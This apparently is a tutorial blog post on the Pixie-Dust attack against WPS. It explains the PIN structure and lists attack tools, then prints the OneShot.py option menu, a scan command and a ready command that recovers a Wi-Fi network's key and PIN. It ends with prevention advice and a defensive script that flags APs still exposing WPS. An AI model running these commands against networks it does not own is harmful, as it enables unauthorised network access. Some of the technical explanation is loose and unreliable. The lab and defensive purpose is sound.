We covered one of the most popular wireless vulnerabilities, that is, the WPS feature. Most wireless attacks that target this feature focus on guessing the 8-digit WPS PIN by recovering the two pre-shared keys (PSKs) that constitute the WPS PIN, and this is how the Pixie-Dust attack works. We demonstrated how this works in a Linux lab environment dedicated to that purpose.
What is WPS?
The goal of Wi-Fi Protected Setup (WPS), formerly known as Wi-Fi Simple Config, is to make it easy to establish a secure wireless network in your home.
The protocol, which was developed by Cisco and debuted in 2006, aims to make it simple for home users to set up Wi-Fi Protected Access and to add new devices to an existing network without having to enter complicated passphrases.
These users may be intimidated by the available security options or have little experience with wireless security. Devices from Brother, Canon, and HP all use it for their printers. WPS is a wireless protocol that allows you to join specific Wi-Fi devices, like security cameras and printers, to the Wi-Fi network without having to provide the password. Additionally, some devices connect to the wireless network using a different method known as the WPS PIN.
The network owner controls who joins the home network through Wi-Fi Protected Setup: a new device is admitted only when the WPS button on the home router is pushed, so other users cannot connect without the owner's involvement.
What is Pixie-Dust Attack against WPS?
A Pixie-Dust attack works by brute-forcing the WPS PIN. WPS was designed to make router access simpler, and it succeeded in that regard: for hackers.
A WPS PIN is eight digits long and is split into two halves, each of which is used to derive one of two Pre-Shared Keys (PSKs). To understand how a Pixie Dust attack works, you first need to understand how the exchange with the AP proceeds:
1. Computer sends - EAPOL Start
2. Router sends - EAP-Request for the Identity
3. Computer sends - EAP-Response with the Identity
4. Router sends - EAP request
5. Computer sends - EAP response
Two more nonces, which are meant to be generated randomly, are needed in order to brute-force the PSKs described above. The crucial point is that on flawed implementations these "random" values are either derived from the same material as the hashes or are simply zeroes, so the PSKs can be brute-forced even on a sluggish system! The attack only works when the router's implementation is flawed in this way, which it usually is, and you should be able to locate a list of susceptible routers online.
Wireless Attack Tools Against WPS
- Aircrack-ng
- Oneshot.py
- Pixiewps
Attacking WPS With Oneshot.py
OneShot performs a Pixie Dust attack without having to switch the interface to monitor mode.
We can invoke the help menu first:
oneshot.py <arguments>
Required arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts [0]
-w, --write : Write AP credentials to the file on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Alway print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
Next, we scan for wireless networks from the wireless interface:
iw dev wlan0 scan
The output of the above command gives us details about the available wireless networks. We choose a network with WPS enabled and start the attack:
python3 oneshot.py -i wlan0 -b 02:00:30:00:01:30 -K
As explained in the video below, if successful, the above command will reveal the wireless network's security key and the WPS PIN.
Preventing WPS Attacks
To prevent wireless attacks that target the WPS feature, simply turn it off in the router's admin panel or by pushing the WPS button back to its OFF state.
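To check that WPS really is off on your own APs, rather than trusting the admin panel, the `iw dev wlan0 scan` output from the scanning step can be parsed for the WPS information element. This is an added example, not code from the original post or from OneShot; the scan text is constructed to follow the layout iw prints, and the WPS field names and the set of PIN-based config methods are assumptions about that layout.

```python
import re

# Constructed sample of `iw dev wlan0 scan` output (not a real capture): the first AP
# still advertises WPS as configured and unlocked, the second has WPS switched off.
SAMPLE_SCAN = """\
BSS 02:00:30:00:01:30(on wlan0)
\tSSID: LabNet
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * Config methods: Label, PBC
\t\t * AP setup locked: 0x00
\tRSN:\t * Version: 1
BSS 02:00:30:00:02:40(on wlan0)
\tSSID: HomeNet
\tRSN:\t * Version: 1
"""

# WPS config methods that involve a PIN exchange; PBC alone does not.
PIN_METHODS = {"Label", "Display", "Keypad"}

def parse_scan(text):
    """Split iw scan output into one record per BSS, keeping the WPS fields."""
    networks, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = {"bssid": m.group(1), "ssid": "", "wps": False, "wps_state": None,
                   "config_methods": [], "setup_locked": False}
            networks.append(cur)
            continue
        if cur is None:
            continue
        s = line.strip()
        if s.startswith("SSID:"):
            cur["ssid"] = s[5:].strip()
        elif s.startswith("WPS:"):          # WPS information element is present
            cur["wps"] = True
        elif s.startswith("* Wi-Fi Protected Setup State:"):   # 1 = unconfigured, 2 = configured
            cur["wps_state"] = int(s.split(":")[1].split()[0])
        elif s.startswith("* Config methods:"):
            cur["config_methods"] = [c.strip() for c in s.split(":", 1)[1].split(",")]
        elif s.startswith("* AP setup locked:"):
            cur["setup_locked"] = int(s.split(":")[1], 16) != 0
    return networks

def wps_pin_exposed(networks):
    """APs advertising WPS as configured, unlocked and with a PIN method: the ones to
    switch off in the admin panel, then re-check with a fresh scan afterwards."""
    return [n for n in networks if n["wps"] and n["wps_state"] == 2
            and not n["setup_locked"] and PIN_METHODS & set(n["config_methods"])]
```

Run `parse_scan` on the real output of `iw dev wlan0 scan` and anything `wps_pin_exposed` returns is an AP on which the WPS change did not take effect.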
Check out the video below for detailed explanation.